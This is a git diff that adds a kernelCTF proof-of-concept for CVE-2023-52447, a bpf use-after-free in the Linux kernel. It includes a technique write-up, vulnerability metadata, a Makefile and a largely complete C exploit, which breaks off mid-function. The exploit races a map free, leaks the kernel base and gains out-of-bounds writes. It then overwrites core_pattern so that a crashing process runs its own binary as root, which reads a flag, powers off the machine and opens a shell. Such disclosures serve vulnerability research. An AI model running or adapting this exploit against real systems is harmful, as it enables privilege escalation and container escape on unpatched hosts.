diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md new file mode 100755 index 00000000..f4c8e28c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/exploit.md @@ -0,0 +1,271 @@ +# Exploit Tech Overview + +Start from https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bba1dc0b55ac, free bpf map don't need to sync with rcu_lock. +We note that bpf program is running under rcu_lock and lookup arraymap from array_of_maps won't increasing it's refcount. +So such a bpf program allow us to get a reference to an arraymap without increasing it's refcount. +```c + BPF_LD_MAP_FD(BPF_REG_9, array_of_map), + BPF_MAP_GET_ADDR(0, BPF_REG_8), + BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), + BPF_MAP_GET_ADDR( + 0, + BPF_REG_8), //store a arraymap from array_of_map without increase refcount at BPF_REG_8 +``` + +In summary, the vulnerability is that bpf program can hold arraymap pointer without increase refcount if it's from array_of_maps. +If bpf first stores a arraymap pointer into one register, and do some time consume operation in the middle of program. +It gives other thread chance to free that arraymap can reclaim it to another structure like array_of_maps. +In our exploit, arraymap and array_of_maps both under cache kmalloc-1024. + + +```C +//store a arraymap from array_of_map without increase refcount at BPF_REG_8 +BPF_LD_MAP_FD(BPF_REG_9, array_of_map), +BPF_MAP_GET_ADDR(0, BPF_REG_8), +BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), +BPF_MAP_GET_ADDR(0,BPF_REG_8), +``` + +`bpf_ringbuf_output` is a bpf function that use memcpy to copy buf to into another buf in line [1]. +```C +BPF_CALL_4(bpf_ringbuf_output, struct bpf_map *, map, void *, data, u64, size, + u64, flags) +{ + struct bpf_ringbuf_map *rb_map; + void *rec; + + if (unlikely(flags & ~(BPF_RB_NO_WAKEUP | BPF_RB_FORCE_WAKEUP))) + return -EINVAL; + + rb_map = container_of(map, struct bpf_ringbuf_map, map); + rec = __bpf_ringbuf_reserve(rb_map->rb, size); + if (!rec) + return -EAGAIN; + + memcpy(rec, data, size); //[1] + bpf_ringbuf_commit(rec, flags, false /* discard */); + return 0; +} +``` + +If buf size is large, it will take some time to finish. +It will be a good choice to extend the race windows for release and reclaim. + +```C +// do time comsume operation using BPF_FUNC_ringbuf_output copy large size buffer +BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), +BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), +BPF_MOV64_IMM(BPF_REG_3, 0x10000000), +BPF_MOV64_IMM(BPF_REG_4, 0x0), +BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_output) +``` + +Once the thread on one core is busy at bpf program. +We use another thread in another core to free and reclaim. +Using a mmapable bpf to get the signal from bpf to nodify us we can start free. + +```c +// Create a mmapable arraymap to signal we have stored target arraymap + int signal = bpf_create_map_mmap(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + // mmap arraymap region for userspace to know signal. + signal_addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, + signal, 0); +``` + +thread0 write value `1` into our signal arraymap +```c + BPF_LD_MAP_FD(BPF_REG_9, signal), + BPF_MAP_GET_ADDR(0, BPF_REG_7), + BPF_ST_MEM( + BPF_W, BPF_REG_7, 0, + 1), // write value one to signal that we have stored target arraymap + +``` + +thread1 busy wait until signal_addr become `1` and start free target +```c + while (signal_addr[0] == 0) + ; + // Free target + update_elem(array_of_map, 0, victim); +``` + +thread2 busy wait until signal_addr become `1` and start spray to reclaim as array_of_maps. +Max_entries as 0x30 is to make sure reclaim array_of_maps in kmalloc-1024 which as cache as arraymap. + +```c + while (signal_addr[0] == 0) + ; + for (int i = 0; i < 0x100; i++) { + spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, + 0x30, samplemap); + update_elem(spray_fd[i], 0, victim); + } + +``` + + +Bpf program treats BPF_REG_8 stored map address as arrymap, but it's arry_of_maps. +```C +// Now BPF_REG_8 is freed and reallocate as array_of_map +BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,0), +``` + +We can leak arrymap address and array_map_ops by malformed arraymap. +Once we know array_map_ops kernel address, we can find the kASLR base address +``` +gef➤ p &array_map_ops +$2 = (const struct bpf_map_ops *) 0xffffffff829c29e0 +gef➤ p _stext +$3 = {} 0xffffffff81000000 +``` + +```C +BPF_LDX_MEM( BPF_DW, BPF_REG_0, BPF_REG_8, 0), // Now BPF_REG_8 is freed and reallocate as array_of_map +BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 0), // store a arrymap address to our arrymap as value +BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110), // adjust address to make value as bpf_array.map +BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_0,0), //store our malformed arraymap info array_of_maps +``` + +# Exploit Tech Detail + +The exploit after win the race + +* Modified victim arraymap's max_entries and index_mask. +* Use victim arraymap to modified near array_of_maps's value index 0 arraymap as (core_pattern-struct_bpf_array_offset). +* Update array_of_maps to modify core_pattern. +* Achieve container escape. + + +## Modified victim arraymap's max_entries and index_mask. + +As the value is adjust as bpf_array.map, so we can create a bpf program to modify map.max_entrieds and array->index_mask + +```C + BPF_LD_MAP_FD(BPF_REG_9, target), + BPF_MAP_GET_ADDR(0, BPF_REG_9), + BPF_MAP_GET_ADDR(4, BPF_REG_8), + BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), //modify map.max_entries + + BPF_MAP_GET_ADDR(0x20, BPF_REG_8), + BPF_ST_MEM(BPF_W, BPF_REG_8, 4,0xffff), //modify array->index_mask +``` + +Modify map.max_entries as 0x800 to make sure it can overwrite to the next chunk under kmalloc-1024. +Modify array->index_mask to 0xffff to achive oob read/write in array_map_lookup_elem and array_map_update_elem. +```c +static void *array_map_lookup_elem(struct bpf_map *map, void *key) +{ +... + + return array->value + (u64)array->elem_size * (index & array->index_mask); + + +static long array_map_update_elem(struct bpf_map *map, void *key, void *value, + u64 map_flags) +{ +... + val = array->value + + (u64)array->elem_size * (index & array->index_mask); +``` + + +So later we use bpf syscall to call array_map_lookup_elem/array_map_update_elem on bigger index. + +## Use victim arraymap to modified near array_of_maps's value index 0 arraymap as (core_pattern-struct_bpf_array_offset). + +Out of bound access from victim to modify next chunk's contents. +Use heap feng shui. Allocate some array_of_maps before and after victim arraymap. +```c + // Allocate some array of maps before victim + for (int i = 0; i < 0x10; i++) + oob[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30, + samplemap); + victim = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + + // Allocate some array of maps after victim + for (int i = 0; i < 0x10; i++) + oob[i + 0x10] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, + 0x30, samplemap); + +``` +The next chunk can be array_of_maps and we ovewrite its index 0 arraymap. +```c + // Store the address (core_pattern - struct_bpf_array_offset) we want to overwrite. + update_elem(victim, (0x400 + 0x110 - 0x110) / 8, kaddr); +``` + +## Update array_of_maps to modify core_pattern. + +Create another bpf program to modify index 0 arraymap and core_pattern will be overwritten. + +```C +BPF_LD_MAP_FD(BPF_REG_9, target), +BPF_MAP_GET_ADDR(0, BPF_REG_9), +BPF_MAP_GET_ADDR(0, BPF_REG_8), // BPF_REG_8 will point to core_pattern +BPF_MAP_GET_ADDR(1, BPF_REG_7), // BPF_REG_8 will point to core_pattern+8 +BPF_MAP_GET_ADDR(2, BPF_REG_6), // BPF_REG_8 will point to core_pattern+16 + +BPF_LD_MAP_FD(BPF_REG_9, data), + +// Modify core_pattern to |/proc/%P/fd/666 %P +BPF_MAP_GET(0, BPF_REG_4), +BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0), +BPF_MAP_GET(1, BPF_REG_4), +BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0), +BPF_MAP_GET(2, BPF_REG_4), +BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_4, 0), + +BPF_MOV64_IMM(BPF_REG_0, 0), +BPF_EXIT_INSN() +``` + +## Achieve container escape. + +After core_pattern being overwritten to `|/proc/%P/fd/666 %P`: + +We then use memfd and write an executable file payload in fd 666. +```C +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} +``` + +Later when coredump happened, it will execute our executable file as root in root namespace: +```C +*(size_t*)0=0; //trigger coredump +``` + +This code for root to run looks like: +```c++ +// This section of code will be execute by root! +int pid = strtoull(argv[1], 0, 10); +int pfd = syscall(SYS_pidfd_open, pid, 0); +int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); +int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); +int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); +dup2(stdinfd, 0); +dup2(stdoutfd, 1); +dup2(stderrfd, 2); +/* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ +system("cat /flag"); +execlp("bash", "bash", NULL); +``` diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/vulnerability.md new file mode 100755 index 00000000..b4c36e77 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilites: NA + - Kernel configuration: CONFIG_BPF_SYSCALL=y + - User namespaces required: No +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=bba1dc0b55ac462d24ed1228ad49800c238cd6d7 +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=876673364161da50eed6b472d746ef88242b2368 +- Affected Version: v5.8 - v6.6 +- Affected Component: bpf +- Syscall to disable: bpf +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52447 +- Cause: Use-After-Free +- Description: A use-after-free vulnerability in the Linux kernel's bpf. Release the reference of the old element in the map during map update or map deletion. The release must be deferred, otherwise the bpf program may incur use-after-free problems. We recommend upgrading past commit 876673364161da50eed6b472d746ef88242b2368. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/Makefile b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/Makefile new file mode 100755 index 00000000..71952bf8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/Makefile @@ -0,0 +1,7 @@ +all: exploit + +exploit: exploit.c + gcc -o exploit exploit.c -static -pthread + +clean: + rm -rf exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit new file mode 100755 index 00000000..5a4fb23d Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c new file mode 100755 index 00000000..5cf26b4a --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c @@ -0,0 +1,585 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef __NR_BPF +#define __NR_BPF 321 +#endif +#define ptr_to_u64(ptr) ((__u64)(unsigned long)(ptr)) +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#define PAUSE \ + { \ + printf(":"); \ + int x; \ + read(0, &x, 1); \ + } + +#define BPF_F_MMAPABLE 1024 +#define BPF_FUNC_ringbuf_query 134 +#define BPF_FUNC_ringbuf_reserve 131 +#define BPF_MAP_TYPE_RINGBUF 27 +#define BPF_FUNC_ringbuf_discard 133 +#define BPF_FUNC_ringbuf_output 130 + +#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ + ((struct bpf_insn){ .code = CODE, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = IMM }) + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn){ .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32)(IMM) }), \ + ((struct bpf_insn){ .code = 0, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64)(IMM)) >> 32 }) + +#define BPF_MOV64_IMM(DST, IMM) \ + BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM) + +#define BPF_MOV_REG(DST, SRC) \ + BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0) + +#define BPF_MOV64_REG(DST, SRC) \ + BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0) + +#define BPF_MOV_IMM(DST, IMM) \ + BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM) + +#define BPF_RSH_REG(DST, SRC) \ + BPF_RAW_INSN(BPF_ALU64 | BPF_RSH | BPF_X, DST, SRC, 0, 0) + +#define BPF_LSH_IMM(DST, IMM) \ + BPF_RAW_INSN(BPF_ALU64 | BPF_LSH | BPF_K, DST, 0, 0, IMM) + +#define BPF_ALU64_IMM(OP, DST, IMM) \ + BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM) + +#define BPF_ALU64_REG(OP, DST, SRC) \ + BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0) + +#define BPF_ALU_IMM(OP, DST, IMM) \ + BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM) + +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM) + +#define BPF_JMP_REG(OP, DST, SRC, OFF) \ + BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0) + +#define BPF_JMP32_REG(OP, DST, SRC, OFF) \ + BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0) + +#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \ + BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM) + +#define BPF_EXIT_INSN() BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0) + +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) + +#define BPF_LD_IMM64(DST, IMM) BPF_LD_IMM64_RAW(DST, 0, IMM) + +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM) + +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0) + +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0) + +#define BPF_LD_ABS(SIZE, IMM) \ + ((struct bpf_insn){ .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + +#define BPF_MAP_GET(idx, dst) \ + BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \ + BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ + BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ + BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), \ + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \ + BPF_FUNC_map_lookup_elem), \ + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \ + BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0), \ + BPF_MOV64_IMM(BPF_REG_0, 0) + +#define BPF_MAP_GET_ADDR(idx, dst) \ + BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \ + BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ + BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ + BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), \ + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \ + BPF_FUNC_map_lookup_elem), \ + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \ + BPF_MOV64_REG((dst), BPF_REG_0), BPF_MOV64_IMM(BPF_REG_0, 0) + +#define LOG_BUF_SIZE 65536 + +#define BPF_HEAVY_JOB \ + BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), \ + BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), \ + BPF_MOV64_IMM(BPF_REG_3, 0x10000000), \ + BPF_MOV64_IMM(BPF_REG_4, 0x0), \ + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \ + BPF_FUNC_ringbuf_output) + +#define INST(x) (sizeof(x) / sizeof(struct bpf_insn)) + +char bpf_log_buf[LOG_BUF_SIZE]; +char buf[0x1000]; + +void set_cpu(int i) +{ + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +int bpf_create_map(enum bpf_map_type map_type, unsigned int key_size, + unsigned int value_size, unsigned int max_entries, + unsigned int map_fd) +{ + union bpf_attr attr = { .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries, + .inner_map_fd = map_fd }; + + return SYSCHK(syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr))); +} + +int bpf_create_map_mmap(enum bpf_map_type map_type, unsigned int key_size, + unsigned int value_size, unsigned int max_entries, + unsigned int map_fd) +{ + union bpf_attr attr = { + .map_type = map_type, + .key_size = key_size, + .value_size = value_size, + .max_entries = max_entries, + .inner_map_fd = map_fd, + .map_flags = BPF_F_MMAPABLE, + }; + + return SYSCHK(syscall(__NR_BPF, BPF_MAP_CREATE, &attr, sizeof(attr))); +} + +int bpf_lookup_elem(int fd, const void *key, void *value) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = ptr_to_u64(key), + .value = ptr_to_u64(value), + }; + + return SYSCHK( + syscall(__NR_BPF, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr))); +} + +int bpf_update_elem(int fd, const void *key, const void *value, uint64_t flags) +{ + union bpf_attr attr = { + .map_fd = fd, + .key = ptr_to_u64(key), + .value = ptr_to_u64(value), + .flags = flags, + }; + + return SYSCHK( + syscall(__NR_BPF, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr))); +} + +int bpf_prog_load(enum bpf_prog_type type, const struct bpf_insn *insns, + int insn_cnt, const char *license) +{ + union bpf_attr attr = { + .prog_type = type, + .insns = ptr_to_u64(insns), + .insn_cnt = insn_cnt, + .license = ptr_to_u64(license), + .log_buf = ptr_to_u64(bpf_log_buf), + .log_size = LOG_BUF_SIZE, + .log_level = 3, + }; + + return syscall(__NR_BPF, BPF_PROG_LOAD, &attr, sizeof(attr)); +} + +void *write_msg(void *x) +{ + int fd = *(int *)x; + + ssize_t n = write(fd, buf, 1); + return NULL; +} + +int update_elem(int mapfd, int key, size_t val) +{ + return bpf_update_elem(mapfd, &key, &val, 0); +} + +size_t get_elem(int mapfd, int key) +{ + size_t val; + bpf_lookup_elem(mapfd, &key, &val); + return val; +} + +void load_bpf_prog(struct bpf_insn *prog, int prog_cnt, int *sfd) +{ + int progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, prog_cnt, + "GPL"); + if (progfd < 0) { + puts("Fail"); + puts(bpf_log_buf); + exit(0); + } + socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd); + setsockopt(sfd[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)); + close(progfd); +} +int init_exploit_prog(struct bpf_insn **ret, int target, int data) +{ + struct bpf_insn prog[] = { BPF_LD_MAP_FD(BPF_REG_9, target), + BPF_MAP_GET_ADDR(0, BPF_REG_9), + BPF_MAP_GET_ADDR(0, BPF_REG_8), // BPF_REG_8 will point to core_pattern + BPF_MAP_GET_ADDR(1, BPF_REG_7), // BPF_REG_8 will point to core_pattern+8 + BPF_MAP_GET_ADDR(2, BPF_REG_6), // BPF_REG_8 will point to core_pattern+16 + + BPF_LD_MAP_FD(BPF_REG_9, data), + + // Modify core_pattern to |/proc/%P/fd/666 %P + BPF_MAP_GET(0, BPF_REG_4), + BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0), + BPF_MAP_GET(1, BPF_REG_4), + BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0), + BPF_MAP_GET(2, BPF_REG_4), + BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_4, 0), + + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN() }; + *ret = calloc(1, sizeof(prog)); + memcpy(*ret, prog, sizeof(prog)); + return INST(prog); +} + +size_t write_core_pattern(int target, int data) +{ + int sfd[2]; + + // load exploit program and trigger + struct bpf_insn *exploit_prog = NULL; + int exploit_prog_cnt = init_exploit_prog(&exploit_prog, target, data); + load_bpf_prog(exploit_prog, exploit_prog_cnt, sfd); + write(sfd[0], buf, 1); + close(sfd[0]); + close(sfd[1]); + free(exploit_prog); + return 0; +} + +int init_leak_prog(struct bpf_insn **ret, int target, int data) +{ + // Use bpf program to get address of array_map_ops + struct bpf_insn prog[] = { + BPF_LD_MAP_FD(BPF_REG_9, target), + BPF_MAP_GET_ADDR(0, BPF_REG_9), + BPF_MAP_GET(0, BPF_REG_8), + BPF_LD_MAP_FD(BPF_REG_9, data), + BPF_MAP_GET_ADDR(0, BPF_REG_9), + BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_8, + 0), //store array_map_ops + + BPF_LD_MAP_FD(BPF_REG_9, target), + BPF_MAP_GET_ADDR(0, BPF_REG_9), + BPF_MAP_GET_ADDR(4, BPF_REG_8), + BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), //modify map.max_entries + + BPF_MAP_GET_ADDR(0x20, BPF_REG_8), + BPF_ST_MEM(BPF_W, BPF_REG_8, 4, + 0xffff), //modify array->index_mask + + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN() + }; + *ret = calloc(1, sizeof(prog)); + memcpy(*ret, prog, sizeof(prog)); + return INST(prog); +} +size_t leak_kbase(int target) +{ + int sfd[2]; + int data = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x10, 0); + + // load leak program and trigger + struct bpf_insn *leak_prog = NULL; + int leak_prog_cnt = init_leak_prog(&leak_prog, target, data); + load_bpf_prog(leak_prog, leak_prog_cnt, sfd); + write(sfd[0], buf, 1); + size_t ret = get_elem(data, 0); + close(data); + close(sfd[0]); + close(sfd[1]); + free(leak_prog); +#define core_pattern 0xffffffff8359e7a0 +#define array_map_ops 0xffffffff829c29e0 +#define struct_bpf_array_offset 0x110 + return ret - array_map_ops + core_pattern - struct_bpf_array_offset; +} + +int init_race_prog(struct bpf_insn **ret, int array_of_map, int *ringbuf, + int arraymap, int signal) +{ + struct bpf_insn prog[] = { + BPF_LD_MAP_FD(BPF_REG_9, array_of_map), + BPF_MAP_GET_ADDR(0, BPF_REG_8), + BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), + BPF_MAP_GET_ADDR( + 0, + BPF_REG_8), //store a arraymap from array_of_map without increase refcount at BPF_REG_8 + + BPF_LD_MAP_FD(BPF_REG_9, signal), + BPF_MAP_GET_ADDR(0, BPF_REG_7), + BPF_ST_MEM( + BPF_W, BPF_REG_7, 0, + 1), // write value one to signal that we have stored target arraymap + + BPF_LD_MAP_FD(BPF_REG_9, arraymap), + BPF_MAP_GET_ADDR( + 0, + BPF_REG_9), // store leaked arraymap address into BPF_REG_9 later + + BPF_LD_MAP_FD(BPF_REG_1, ringbuf[0]), + BPF_MOV64_IMM(BPF_REG_2, 0x10000000), + BPF_MOV64_IMM(BPF_REG_3, 0x0), + BPF_RAW_INSN( + BPF_JMP | BPF_CALL, 0, 0, 0, + BPF_FUNC_ringbuf_reserve), // allocate a huge size buf from ringbuf + BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), + BPF_EXIT_INSN(), + BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), + BPF_LD_MAP_FD(BPF_REG_6, ringbuf[1]), + + // do time comsume operation using BPF_FUNC_ringbuf_output copy large size buffer + BPF_HEAVY_JOB, + + BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), + BPF_MOV64_IMM(BPF_REG_2, 0x1), + BPF_RAW_INSN( + BPF_JMP | BPF_CALL, 0, 0, 0, + BPF_FUNC_ringbuf_discard), // discard previous allocate buffer + BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, + BPF_FUNC_get_numa_node_id), + BPF_LDX_MEM( + BPF_DW, BPF_REG_0, BPF_REG_8, + 0), // Now BPF_REG_8 is freed and reallocate as array_of_map + BPF_STX_MEM( + BPF_DW, BPF_REG_9, BPF_REG_0, + 0), // store a arrymap address to our arrymap as value + BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110), + BPF_STX_MEM( + BPF_W, BPF_REG_8, BPF_REG_0, + 0), //make idx 0 of array_of_map point to our control data + BPF_MOV64_IMM(BPF_REG_0, 0), + BPF_EXIT_INSN(), + }; + *ret = calloc(1, sizeof(prog)); + memcpy(*ret, prog, sizeof(prog)); + return INST(prog); +} + +volatile char *signal_addr; +int spray_fd[0x100]; +int samplemap, victim; +int ringbuf[2]; +int oob[0x20]; + +void *spray_job(void *x) +{ + while (signal_addr[0] == 0) + ; + for (int i = 0; i < 0x100; i++) { + spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, + 0x30, samplemap); + update_elem(spray_fd[i], 0, victim); + } +} +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +int main(int argc, char **argv) +{ + if (argc > 1) { + // This section of code will be execute by root! + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger"); + exit(0); + } + setvbuf(stdout, 0, 2, 0); + + // smaplemap is for creating array of maps + samplemap = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + + // Allocate some array of maps before victim + for (int i = 0; i < 0x10; i++) + oob[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30, + samplemap); + victim = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + + // Allocate some array of maps after victim + for (int i = 0; i < 0x10; i++) + oob[i + 0x10] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, + 0x30, samplemap); + + // Create ringbuf for time cosuming job + ringbuf[0] = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x20000000, 0); + ringbuf[1] = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x20000000, 0); + + // Create a arraymap for storing leaked heap address + int arraymap = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); + + // Create a mmapable arraymap to signal we have stored 